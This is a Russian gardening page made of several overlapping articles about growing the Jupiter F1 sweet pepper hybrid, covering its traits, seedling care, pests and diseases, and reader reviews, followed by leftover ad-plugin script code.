1 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Перец юпитер описание

Характеристика и описание перца «Юпитер»

Сорт перца «Юпитер» принадлежит к гибридам. Он выведен селекционерами на территории Голландии в конце прошлого столетия, и уже более двадцати лет радует огородников своими крупными и вкусными плодами.

Описание сорта

Данный сорт выращивают по всей территории России, Молдовы и Украины, в районах с суровым климатом «Юпитер» рекомендуется сажать в теплицах, в южных районах его высаживают в открытый грунт. Относится к полуштамбовым растениям, напоминает маленькое деревце. Его высота может достигать 50-60 см. С одного квадратного метра можно собрать 4 кг урожая. Попробовать сочные плоды можно уже через 110-120 дней после появления всходов.

Обладает массивным прямым стеблем. Листья на верхушке имеют ярко-зеленый окрас, нижние темно-зеленые. Плоды кубообразной формы на кончике перца, а также возле хвоста небольшие выпуклости, изнутри разделены на 4 доли перегородками. На стадии формирования плоды зеленые, при созревании становятся ярко-красными. Вес одного перца примерно 120-170 грамм, а длина приблизительно 11 см. Стенка может быть толщиной от 5 до 10 мм. Кожица гладкая, имеет восковой налет.

«Юпитер» относится к обширной группе сладких перцев. На вкус сладкий, горечи нет даже в семенах. В пищу употребляют как в свежем виде, к примеру, в салатах, а также добавляют в разные блюда и консервируют, из этого сорта получится отменное лечо.

Достоинства

  • Высокая урожайность.
  • Плоды привлекательные на вид.
  • Отличные вкусовые качества, перец сочный и сладкий.
  • «Юпитер» хорошо переносит высокую температуру.
  • Сорт устойчив к заболеваниям.

Недостатки

  • Собранные семена не дадут такого урожая как купленные в специализированном магазине.

Выращивание и уход

«Юпитер» принадлежит к среднеранним растениям, поэтому высаживать семена на рассаду необходимо уже в конце февраля начале марта. Ростки появляются в течение недели, и спустя 65 дней рассаду можно переносить на постоянное место. Пикировка перца не обязательна, ведь она задерживает развитие рассады на 14 дней. В случае если вы не будете пикировать растение, то при посадке семян, расстояние между ними должно быть не менее 10см.

Перец очень теплолюбивый, оптимальной для него температурой днем считается 24-28 градусов, а ночью 18-20. При температуре 0 0 C растение погибает. При высадке в открытую почву уже в мае, растение рекомендуется накрывать агроволокном, ведь ночью еще может быть прохладно. Или же можно сделать переносной парник небольшого размера и использовать его до того как минет угроза заморозков. Сажают растение, придерживаясь схемы 50 на 40. Большое значение имеет место для посадки, лучше сажать перец там, где ранее росли лук, огурцы или капуста.

Хорошо реагирует на фосфатно-калийные удобрения. Оптимальное время для полива рассады это утро, делать это лучше теплой водой, лить ее следует под корень. При высокой температуре следует поливать растение чаще.

Если на кустике появились сухие листики, это может сигнализировать о недостатке в почве питательных веществ, или же влиянии неблагоприятных для него погодных условий, а также заболевании. На стадии формирования плодов перцу необходима подкормка, удобрить можно раствором птичьего помета в соотношении 1:10 или же коровяком, разбавленным с водой в соотношении 1:5. После подкормки растения, необходимо полить и разрыхлить грунт.

Сорт «Юпитер» подлежит хранению и хорошо переносит транспортировку, сохраняя товарный вид. Имеет природный иммунитет к картофельной и табачной мозаике.

За месяц до окончания вегетации рекомендуется прищипывание новых завязей и ростков, для того что бы дать дозреть уже сформированным плодам. Собирают урожай в стадии технической спелости.

Отзывы

Мария 50 лет Краснодарский край

Выращиваю этот сорт уже три года, и ни разу не пожалела. Плоды вырастают крупные, мясистые. Имеют отличные вкусовые качества сладкий и сочный. Вся семья его очень любит. Делаю из него заготовки на зиму, просто мелко режу в морозилку, что б потом добавлять в разные блюда, и целиком замораживаю и потом фарширую. Также из него очень вкусное лечо, густое и ароматное. А аджика просто восхитительная! Рекомендую всем, кто любит сладкий перец вырастить этот сорт!

«Юпитер» это самый превосходный сорт из всех, которые я сажал раньше. Плоды сладкие, мясистые, горечь совсем не присутствует. Придает особый вкус борщу и супам. Жена морозит на зиму в морозилке и консервирует в томатном соке и дольками. Сажаю второй год, планирую выращивать и в следующем.

Анастасия 30 лет Новочеркасск

Соседка по даче угостила несколькими перчинками, мне очень понравился вкус, решила посадить и себе. В следующем сезоне купила рассаду, урожай просто великолепный, плоды красивые. Я очень довольна!

Заключение

«Юпитер» дает хороший урожай, и использование перца универсальное, наверное, поэтому хозяйки предпочитают сажать этот сорт у себя на участке.

Сорт перцев Юпитер

Перец Юпитер F1 — популярный гибрид, выведенный в 90-х годах в Нидерландах.

Сорт перцев Юпитер

Характеристика сорта

Перец Юпитер F1 получил название в честь самой большой планеты Солнечной системы, благодаря крупным размерам. На данный момент этот гибрид достаточно популярен на рынке перцев за счет ряда свойств:

  • низкая цена семян;
  • высокая стрессоустойчивость (относительно хорошо переносит засуху, транспортабельный);
  • качественные товарные характеристики плода;
  • хороший иммунитет к ряду заболеваний;
  • среднеранний срок созревания;
  • повышенная урожайность.

Описание куста

Куст перца Юпитер имеет зонтикообразную форму с маленьким углублением по центру, что защищает плоды от солнечных ожогов. Данный гибрид относится к низкорослым: он достигает не более 60 см в высоту.

Он менее подвержен заболеваниям, не требует тщательного ухода. Характеризуется полураскидистой формой куста со средними, темно-зелеными листьями.

Описание плодов

Перец Юпитер F1 имеют следующие характеристики плодов:

  • кубовидная форма;
  • масса выше среднего (варьируется от 90 г, может достигать даже 300 г);
  • легкая переносимость транспортировки;
  • насыщенно-красный окрас;
  • толстые стенки (около 10-11 см);
  • кожица достаточно плотная, обладает восковым налетом;
  • сочная и хрустящая мякоть, сладкий вкус и универсальность использования в любых кулинарных блюдах.

Рассада

Так как срок созревания гибрида Юпитер F1 составляет около 78 дней, заняться его рассадой стоит уже в конце января или начале февраля.

Для начала нужно семена обрабатывают фунгицидами, чтобы предотвратить появление болезней, и стимуляторами роста. Замачивать семена не нужно. После такой обработки скорость прорастания семян и их качество значительно увеличиваются.

Если культуру выращивают в закрытом помещении (например, в теплице), после появления первых листьев растения рассаживают в разные горшочки. У данной процедуры есть маленький недостаток: она вызывает небольшую задержку в развитии растения после раздражения нежной корневой системы перца. Для экономии времени семена сразу высаживают по отдельным горшкам.

Пересадка в открытый грунт

Растение не нужно формировать

Спустя примерно 50-60 дней после посадки рассады растения пересаживают на готовые грядки в теплице или же на открытый грунт.

Юпитер F1 не нуждается в формировании куста и удалении цветков. При необходимости можно лишь обрезать слабые или бесплодные побеги, чтобы они не мешали развиваться другим.

Кусты очень любят тепло. При выращивании их в более холодном климате стоит соорудить временный парник. Для этого можно использовать пленку.

Полив

После наступления жары важно следить за тем, чтобы почва всегда была влажной. Для этого ее нужно регулярно и обильно поливать. Это является необходимым условием для качественного роста и развития плодов.

Удобрения

До начала, во время и после периода цветения кустов не стоит забывать об удобрении. Предпочтение отдают фосфорно-калийным минералам и разным органическим подкормкам.

Вредители и болезни

Болезни

Сорт обладает иммунитетом к серой гнили и ложной мучнистой росе.

Юпитер подвержен вирусу табачной мозаики. Последствием заболевания является риск потери большей части урожая, поэтому необходимо уделить внимание его профилактике. Распознать его достаточно просто: листья пораженного растения приобретают необычный мраморный рисунок. Данный вирус разрушает хлорофилл, тем самым окончательно прекращая процесс фотосинтеза, необходимый для развития растения.

Существует ряд других заболеваний, угрожающих Юпитеру F1. Фитоплазмоз или Столбур куста появляются из-за воздействия микроорганизмов. Эта болезнь разносится насекомыми-вредителями. На первых стадиях листья куста скручиваются и усыхают, а со временем погибает и все растение. Для предотвращения возможности этого заболевания следует бороться с насекомыми-переносчиками. Если какое-то из растений в рассаде все-таки заболело, его уничтожают. После сбора урожая дезинфицируют весь инвентарь.

При слишком густой рассадке растений и плохом проветривании теплицы существует риск заражения перцев грибковым заболеванием под названием Черная ножка. При появлении этой болезни нижняя часть стеблей куста чернеет, а затем гниет, что приводит к гибели всего растения. При обнаружении черной ножки куст поливают раствором марганцовокислого калия.

Проверенный не одним поколением огородников — перец Юпитер F1: описание сорта и характеристика

От разнообразных сортов овощей разбегаются глаза. Часто неопытный огородник не знает, что выбрать. В таких случаях стоит отдать предпочтение проверенным гибридам, таким, как перец Юпитер F1. Он известен с девяностых годов и является голландским гибридным сортом. Овощи из Нидерландов славятся выносливостью кустов и высоким качеством урожая.

Описание и характеристика сорта

Выведенный в голландской фирме «Сингента» сладкий перец Юпитер F1 распространяется также российских компаний. Самостоятельный сбор семян гибрида невозможен, они не сохраняют качества куста, необходимо приобретать их ежегодно у производителя.

Выращивать гибрид можно в открытом грунте. Он переносит условия южных и центральных регионов РФ. В холодных областях защищают посадки от заморозков пленочными укрытиями или высаживают в теплицу.

Высота куста около 50-60 см, реже до 80 см. Растение зонтиковидной формы надежно защищает урожай от жары. Гибрид созревает поздно – через 130-140 дней после всходов, но в теплых областях может созреть через 110-125 дней.

  • размер зависит от ухода – самые мелкие перцы весят по 90 г, при более тщательном уходе и подкормках могут достигать 170-300 г;
  • форма кубическая, но при нехватке солнца становится призмовидной, чуть вытянутой;
  • цвет красный или бордовый;
  • стенки толстые или очень толстые – от 6-8 мм до 10 и даже 11 мм;
  • внутри 2-4 камеры;
  • кожица покрыта легким восковым налетом;
  • в биологической спелости перец очень вкусный, сладкий.

Овощ используется в домашней кулинарии и заготовках, мариновании, консервации. Можно есть плоды прямо с куста или класть в салаты.

Преимущества и недостатки

  • стабильная, хоть и не рекордно высокая урожайность;
  • хороший вкус;
  • выносливость и неприхотливость;
  • транспортабельность урожая и возможность хранения;
  • универсальность в использовании;
  • устойчивость к засухам;
  • доступные по цене семена.

Минусы:

  • позднеспелость;
  • непригодность к самостоятельному сбору семян.

Урожайность

С 1 кв. м собирают 3-5 кг плодов.

Посадка

Семена, купленные у производителя, не нуждаются в обработке. К их посеву приступают за 60-70 дней до пересадки рассады на участок.

Готовят питательный субстрат по рецепту:

  • 30% рыхлой почвы, желательно чернозема или суглинка;
  • 30% низинного торфа;
  • 30% песка, перлита, вермикулита или опилок;
  • 10% древесной золы и минеральных удобрений.

Кислотность субстрата не должна превышать рН 6,5. В противном случае добавляют еще золы или доломитовой муки.

Посевы увлажняют из пульверизатора и накрывают пленкой. Обеспечивают условия:

  • до прорастания семян – температура +23-28;
  • после проклевывания дневная температура +20-25, ночная +18-20;
  • освещенность 12-16 часов в сутки (при необходимости – с применением фитоламп).

Из общих емкостей кустики нужно распикировать в фазе 2 листьев.

На участок пересаживают по схеме 40 на 60 см.

Выращивание и уход

Полив проводят по вечерам, когда нет прямых солнечных лучей. Вносят воду аккуратно под корень. Предварительно подогревают ее до +22-24. На 1 кв. м требуется 10-12 л, частота – 1-2 раза в неделю.

Формирование не требуется, подвязывают при необходимости. Регулярно рыхлят почву, уничтожают сорняки.

Подкармливают 3-4 раза. Первая подкормка – до начала цветения или даже на этапе рассады. В ней должен преобладать азот. В период цветения и плодоношения вносят готовые комплексы с калием и фосфором.

Вредители и болезни

Из болезней гибрид устойчив к ложной мучнистой росе и серой гнили. Частая болезнь у него – табачная мозаика. Это вирус, который проявляется в пятнах на листве, а затем растение постепенно гибнет. Для защиты необходимо соблюдать севооборот, дезинфицировать почву, бороться с паразитами, которые могут разносить вирус. Если нужно обрезать ветви, инструменты предварительно дезинфицируют. Лечению болезнь не поддается, растения, которые заболели, выкапывают и сжигают.

Еще одна опасная болезнь – столбур. Плоды от нее становятся жесткими, полными древесных волокон и непригодными в пищу. Меры профилактики такие же, как у мозаики.

В остальном для защиты от грибков и бактерий нужно:

  • поливать кусты в меру;
  • проветривать укрытия;
  • сбалансированно подкармливать;
  • держать грядки в чистоте и вовремя пропалывать;
  • соблюдать севооборот;
  • бороться с паразитами.

Против мелких паразитов – паутинного клеща, тли – помогут домашние средства. Это отвар полыни или чистотела, мыльный раствор. При сильных заражениях или появлении колорадского жука, медведки применяют инсектициды, такие как «Карбофос» или «Фосбецид».

Перец Юпитер: описание сорта, урожайность, особенности выращивания

Перец «Юпитер» относится к гибридным сортам. Вывели растение голландские селекционеры еще в 90-х гг. Более десятилетия он радует высокими показателями урожайности, агрономов, которые выращивают этот сорт у себя на грядках.

Характеристики перца «Юпитер»

Сорт «Юпитер» подлежит высадке на открытом грунте и в тепличных массивах. Отлично себя чувствует в различных климатических условиях, но в суровом климате, выращивать рекомендовано в парниках. Урожайность с одного квадратного метра при схеме посадки 40×50 составляет до 4 килограмм.

Растение полуштамбовое, то есть, оно похоже на небольшое деревце. Высота перца достигает 50-60 см. Листья на вершине ярко-зеленые, ближе к земле темно-зеленые. Стебель массивный, устойчивый, прямостоячий. Плоды имеют кубообразную форму с характерными выпуклостями возле хвостика и на конце перца. Во время формирования плоды темно-зеленые, зрелый овощ приобретает ярко-красный цвет. Вес одного перца достигает отметок в 120-140 грамм. Толщина стенки в среднем от 5 до 10 мм.

Сорт «Юпитер» входит в группу сладких перцев. Горечи нет даже в прожилках соединяющих семенную часть со стенками овоща. К предназначению относят:

  • консервирование различными способами (приготовление лечо, консервирование дольками, засолка, приготовление аджики);
  • добавление свежего плода в кулинарию;
  • потребление в свежем виде.

Преимущества и недостатки перца

  • устойчивость к заболеваниям табачной и картофельной мозаики;
  • высокоурожайный;
  • жароустойчивый;
  • плоды массивные, сочные и сладкие.

Недостатком является, то, что из собранных семян гибрида получить такой же урожай, как из купленных семян в магазине невозможно.

Выращивание и уход за растением

Гибридный перец «Юпитер» устойчивое растение, но ему также требуется уход на протяжении всего цикла роста и созревания плодов.

  1. Высевать семена на рассаду необходимо не позднее февраля-марта месяца, так как сорт относится к среднеранним. Рассада в таком случае будет готова к высадке уже мае или начале июня.
  2. По истечению 60-65 дней от момента посева семян ростки уже можно пересаживать в открытый грунт или теплицу. При высаживании в открытый грунт в мае месяце накрывайте растения агроволокном, чтобы достаточно низкая температура ночью не погубила перец. Также можно соорудить небольшой переносной парник, который будет использоваться, пока температура воздуха не достигнет оптимальных отметок.
  3. Перец теплолюбивое растение. Поливать рассаду лучше всего утром, вода должна быть теплой, но не горячей. Удобрять растения нужно фосфорно-калийными добавками, чтобы они набирались силы для плодоношения.
  4. В случае появления желтых или сухих листов нужно их обрывать. Это может быть проявление недостатка различных микроэлементов в почве, влияние погодных условий, болезни.
  5. Перец влаголюбивое растение, поэтому в жаркое время нужно поливать их чаще.

Отзывы

Выращиваю перец «Юпитер» на протяжении трех лет. За все три года он ни разу не разочаровал. Плоды у него крупные, мясистые и очень сочные. Кусты перца небольшие, аккуратные. С виду растения похожи на маленькие декоративные деревья. На третий год высадила 40 кустов, что пришлось даже раздавать плоды своим родственникам. Им перец тоже очень понравился. Весь погреб буквально завален различными консервациями. Люблю замораживать его в морозильной камере, чтобы потом зимой готовить различные блюда со свежими овощами. Рекомендую попробовать сорт «Юпитер» всем любителям сладкого перца.

Сорт «Юпитер» оказался лучшим среди всех сладких перцев, которые я выращивала ранее. Плоды большие и сытные, без горечи, даже у соприкосновения стенок с семенами. Кушать перец приятно как в свежем виде, так и при добавлении его в различные блюда. Сладкие плоды использую для консервации. Засаливаю их как дольками, так и готовлю всяческие соусы. Уход за растениями не вызвал затруднений. Как и советуют специалисты в аграрном деле, я их много поливала и часто рыхлила почву. Один раз мой муж обработал растения от тли и колорадского жука. Собираюсь и дальше продолжать сажать перец «Юпитер» у себя на огородике.

Перец «Юпитер» завоевывает своей простотой в выращивании и замечательным вкусом плодов. Приверженцам сладкого перца он обязательно понравится.

Характеристика и описание перца «Юпитер»

Садоводы, которые не хотят тратить много времени и сил на выращивание перцев выбирают его гибридные сорта. Гибриды в отличие от обычных видов отличаются большей устойчивостью к окружающей среде и даже при минимальном уходе всегда дают хороший урожай.

Среди многообразия сортов выделяется гибрид «Юпитер F1», достойно занявший лидерские позиции благодаря своим качественным характеристикам.

Общее описание сорта

Юпитер F1 – результат работы голландских агрономов из нидерландской семеноводческой организации под названием «Syngenta seeds». Впервые он был культивирован в конце 90-х годов прошлого столетия. Сорт быстро разошелся по Европе и снискал среди садоводов-любителей небывалую популярность. В России о Юпитере узнали лишь в 2003 году. Иностранца приняли не так радужно, как на его родине. Однако за последние 15 лет он отлично прижился в нашей земле и полюбился многим огородникам.

Как и положено гибридам Юпитер имеет много положительных качеств, выгодно отличающих его от других сортов.

Плюсы сорта:

  • высокое качество плодов;
  • крупный размер плодов;
  • быстрое созревание;
  • отличные вкусовые качества;
  • низкая цена на семена;
  • устойчив ко всем опасным заболеваниям;
  • хорошо переносит засуху;
  • имеет отличную лежкость и стойко переносит транспортировку.

Сорт Юпитер хорош во всех смыслах, за исключение одной особенности, присущей всем гибридным сортам: семена плодоносят только один сезон.

Характеристика сорта

Юпитер относится к среднеранним сортам. Период вегетации длится 120-140 дней (с момента высадки рассады до технического созревания плодов проходит 90 дней).

Подходит для выращивания в тепличных условиях, и в открытом грунте. Так как перец – растение теплолюбивое и не терпит капризов погоды, то в Северных регионах и средней полосе лучше растить его в парниках, тогда как на юге он с легкостью растет на уличных грядках.

Перечный куст вырастает невысоким, редко достигает 80 сантиметров. Растение имеет пышную крону, которая хорошо затеняет землю под стеблями, тем самым защищая ее от солнца и задерживая влагу. В некоторых случаях возникает необходимость в подвязывании.

Название перец «Юпитер» получил не просто так: его плоды вырастают мощными, огромными, поражающими воображение, прямо, как и самая большая планета солнечной системы. Кубовидные перцы достигают в своих размерах 15*15 сантиметров, вес в среднем 150-170 граммов. Толщина стенки порой доходит до одного сантиметра.

По своей структуре плод перца плотный, мясистый, с большим процентом сочности. Плоды по вкусу очень сладкие, даже не полностью созревшие можно употреблять в пищу. Хорошо перец идет на приготовление лечо и маринадов, однако лучше наслаждаться его приятным вкусом в свежем виде.

В стадии технической спелости перцы имеют темно-зеленый цвет, который быстро меняется на блестящий темно-красный окрас, переходя в стадию биологической зрелости.

Юпитер хорошо идет на продажу, так как его внешние данные привлекают покупателей, а отличная переносимость транспортировки играет на руку фермерам. К тому же Юпитер достаточно легко растить, ведь он способен выстоять перед неблагоприятными погодными условиями, а также отличается стойким иммунитетом перед рядом заболеваний, в частности редко поражается вирусом табачной мозаики.

Урожай перец Юпитер дает приличный: 3-3,5 килограмма с квадратного метра (5 килограммов при выращивании в теплице), 45 тонн на гектар. Сорт считается высокоурожайным.

Особенности выращивания

Так как до полного созревания плодов проходит порядка четырех месяцев, то лучше высеивать семена как можно раньше, чтобы получить урожай к сроку. Посев благоприятнее всего осуществлять в феврале, хотя многие дачники, выращивая Юпитер не первый год, рекомендуют засаживать этот сорт уже в январе. Если высадить перцы так рано, то уже в мае рассаду можно будет перенести в теплицу.

Так как семена Юпитера всегда покупные, то, естественно все они уже прошли качественный отбор и в пакетике собран лишь потребный материал, который чаще всего уже обработан стимулятором роста и обеззаражен тирамом. В таком случае дополнительно вымачивать их использовать различные средства для обработки не нужно.

Если же на упаковке не написано о том, что семена прошли все необходимые процедуры, то сделать это нужно самим перед посевом.

Подготовка семян:

  • Залить семена раствором из 1 грамма перманганата калия и 100 миллилитров воды. Так происходит обеззараживание.
  • Далее обработать семена стимулятором роста, чтобы повысить их производительность.

Сеют семена обычно в большие ящики, в заранее подготовленный грунт. Земля должна быть теплой, хорошо удобренной (органика и минеральные составы), рыхлой и влажной. Также можно произвести дезинфекцию земли: землю поливают раствором марганца.

Состав почвы:

  • перегной (2 части);
  • крупный речной песок (1 часть);
  • земля с участка (1 часть);
  • древесная зола (2 ст. л.).

Обработанные семена в большинстве случаев очень хорошо всходят. Садоводы отмечают практически стопроцентную всхожесть семенного материала данного сорта. Для того, чтобы семена быстрее завязались и всходы появились быстрее, ящики или емкости, в которых растет перец, нужно покрыть пленкой и обеспечить обилием солнечного света. Так как в конце зимы и ранней весной дни еще короткие, то этого недостаточно для формирования крепких и здоровых побегов. Поэтому в качестве солнца используют лампы дневного света, которые устанавливают прямо над рассадой. Первое время перцу требуется до 18 часов освещения ежедневно. Температура воздуха не менее 25 градусов. Когда рассада немного поднимется, длительность освещения сокращают, а пленку снимают.

Если перец рос в общем грунте, то с появлением двух-трех листочков его необходимо будет пикировать. Пересадку рассады в отдельные емкости следует производить очень осторожно, чтобы не поранить корни. Первое время молодые кустики будут болеть, но через три-четыре дня они окрепнут.

Высадка в грунт

Рассаду Юпитера переносят на уличное произрастание спустя два – два с половиной месяца после посева семян. Происходит это обычно в конце мая, при установлении действительно теплой и солнечной погоды. Торопиться с высадкой перца не стоит, так как любое понижение температуры может спровоцировать болезнь или замедление роста перцев.

Далее, до полного созревания потребуется еще два месяца, примерно столько времени нужно этому среднераннему сорту для того, чтобы плоды налились соком, корка стала твердой и толстой, а вкус обогатился.

Правильная высадка рассады и ее размещение на грядке – залог здорового роста крепких кустов. Перечную грядку готовят заранее, добавляя в почву удобрения, которые поспособствуют быстрому освоению корней в новых условиях. Каждый куст перца высаживают в отдельную лунку, в которую заранее укладывают комплексное минеральное удобрение, состоящее из калия, фосфора и азота.

Рассаду не закапывают глубоко, достаточная величина углубления – до трех сантиметров, корневище должно оставаться рядом с поверхностью, иначе корни начнут расти вширь, и обрастут дополнительными побегами, которые будут забирать питание и влагу в ущерб формирования плодов.

Между кустами должно быть минимум 30 сантиметров, чтобы их корневища не срастались, и каждый куст получал необходимую ему порцию питательных веществ, солнца и воды. Между рядами оставляют 45-50 сантиметров.

Даже если перцы высаживаются в открытый грунт в начале июня, то не лишним будет первое время защищать его от ночной прохлады с помощью временного укрытия. Можно соорудить небольшой парник или покрывать кусты пленкой, кому как нравится.

Если растения растут на открытой грядке, то формировать кусты не стоит. Пусть лучше кусты разрастаются большими, чтобы густая листва спасала перец от перегревания.

Особенности ухода

Чтобы урожай перца был большим, за кустами следует ухаживать, применяя различные приемы обработки. В ответ на внимательный уход он подарит щедрый урожай.

Советы по уходу за перцем Юпитер:

  1. Земля под кустами должна быть рыхлой, поэтому после посадки не стоит утаптывать землю. В потной среде могут развиться такие заболевания как черная ножка или даже слоновья ножка.
  2. Хотя сорт засухоустойчив, все же долго оставлять перцы без воды не стоит, иначе это будет стоить вам большой части урожая. Особенно влага нужна кустам во время их интенсивного роста. Поливать грядки стоит 3-4 раза в неделю. На каждый куст необходимо выливать до трех литров воды.
  3. Рыхление земли вокруг кустов способствует лучшему пропусканию почвы воды и воздуха – двух главных для роста компонентов.
  4. Чтобы влага надолго задерживалась в почве, нужно мульчировать землю под кустами. В качестве мульчи обычно используют опилки или листву. К тому же этот способ отлично предохраняет корни от перегрева во время летнего зноя.
  5. За сезон перцам требуется две подкормки. Первую порцию удобрений вносят через несколько дней после высадки рассады. Вторая подпитка нужна во время плодообразования.

Болезни и вредители

Данный сорт редко подвергается заражению какими-либо болезнями. Он устойчив к таким болезням как:

  • вирус табачной мозаики;
  • картофельный вирус Y;
  • грибковые и бактериальные инфекции.

Если кусты атаковали насекомые-вредители, то перечную грядку обрабатывают обеззараживающими фунгицидами. Хорошо помогают инсектициды Кельтан или можно также обсыпать кусты золой – ее вредители не переносят.

Условия для получения хорошего урожая:

  • вовремя сеять семена;
  • высаживать на грядку только при установлении теплой погоды;
  • грядки перца устраивать в защищенном от сильного солнца и ветра месте;
  • при необходимости подвязывать кусты;
  • вовремя убирать сорняк и окучивать кусты.

Сбор урожая

Собирают урожай перца с июля по сентябрь. Можно срывать плоды, находящиеся в технической стадии спелости. Однако на вкус они такие же сочные и сладкие. Они быстро дозревают, не портясь. Если сорвать с куста еще зеленые перцы, у растения появится больше сил на производство новых плодов. Тем самым вы увеличите свой урожай.

Перцы отлично хранятся в прохладном темной месте.

Отзывы

Живем в средних широтах, поэтому погода у нас тут переменчивая, до июня ночами холодно, а в конце августа тоже можно ожидать низких температур, которые плохо овощи переносят. Всегда очень осмотрительно выбираю сорта перца, чтобы были устойчивы к такому климату как у нас. В последний год выбрала именно сорт «Юпитер».

В целом семена хорошо проросли, рассада вся крепкая была, на крепкую пятерку. Высаживала в грунт в начале июня, но первое время покрывали их пленкой на ночь, чтобы уберечь молодые кустики. Перцы хорошо пережили лето, ничем не заболели, плоды появились в августе, все здоровые, крупные. Внешний вид действительно очень привлекательный. На вкус приличные, сочные. Срывали мы их зелеными, которые, кстати, тоже можно употреблять в пищу. Дозревали быстро, не портились.

Купила семена «Юпитера» в магазине, то ли некачественные, то ли я не умею их проращивать, но семена вообще не взошли, не дали ни одного росточка, пришлось их выкинуть.

Свои семена не умею выращивать на рассаду, поэтому всегда покупаю их. В этот раз предложили мне «Юпитер», ну что ж, решилась попробовать этот гибрид. Перцы на удивление выросли хорошими, а я тот еще садовод. Сами плоды крупные, мясистые, толстокорые. На вкус сочные, сладкие. Действительно очень хороший сорт, не зря его многие хвалят. Урожай хороший и главное — хорошо хранится.

Мой «Юпитер» вырос не с такой толстой кожурой как обещали. А так на вкус и на внешний вид вполне прилично, консервирую его в этом сезоне, посмотрим, как будет на вкус.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
